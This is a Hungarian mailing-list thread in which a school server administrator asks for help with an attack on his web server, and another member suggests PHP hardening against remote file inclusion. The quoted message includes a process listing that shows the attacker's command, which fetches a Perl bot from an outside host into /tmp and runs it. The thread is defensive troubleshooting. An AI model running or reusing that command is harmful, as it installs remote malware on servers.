Segitseg, tamadjak a webszerveremet

[hollo.david at verebelyszki.hu]

Helo!

En ugy gondolom , hogy a php-t kapasbol safe modba kellene rakni,
valoszinu hogy beinclude-olnak egy path-t es ugy tudnak shellt futtatni..
php.ini be kicsit a biztonsagot emelni kellene, pl: allow_url_fopen -t
szinten off-ra tenni!

Ha mar szuletett megoldas bocsi, csak nem olvastam vegig a thread-et.

Udvozlettel:
Hollo David

> >sh-t inditanak? Huh, hat ez eleg csunyan hangzik -az eddigiekhez
> kepest-
> >ez azt jelenti, hogy mar bent vannak. Biztos vagy benne?
>
> Nem, nem vagyok. Nem vagyok egy Linux guru. A fősulin 1 évig tanultam
> Linuxot, azóta próbálom követni a változásokat, de három gyerekem is van
> mellette. Azért használom, mert
> a) Windows szerverekhez még kevesebbet értek
> b) (tegnapig) jobb ötletnek tűnt.
>
> Ami az sh-t illeti, amint első levelemben írtam:
>
> ps kimenete (részlet):
>
> www-data 2715 0.0 0.2 2476 1160 ? S 11:26 0:00 sh -c cd /tmp; wget
> http://cmgforum.net/botek.txt; mv botek.txt .sessx; perl .sessx; rem
> botek.txt.*; wget .... blablabla
>
> Elég egyértelmű, hogy mit akar csinálni, de már a /tmp-be sem tud bejutni.
> Az apache error.log-ja tele van a próbálkozásokkal (permission denied,
> file not exist stb.) Amit nem értek, és ezért nagyon zavar, az a sh -c
> része.  A www-data user-nek a /bin/false a shell-je.
>
> _________________________________________
> FIRST MINUTE SÍELÉSI AJÁNLATOKNézd át az adriatica.net fantasztikus
> síajánlatait és foglalj könnyen, gyorsan, olcsóbban - már most!
> Részletekért klikk ide!
> _______________________________________________
> Techinfo mailing list
> Techinfo at lista.sulinet.hu
> http://lista.sulinet.hu/mailman/listinfo/techinfo
> Illemtan: http://support.bkf.hu/illemtan.html
> Ügyfélszolgálat FAQ: http://www.sulinet.hu/tart/cikk/sc/0/19789/1
>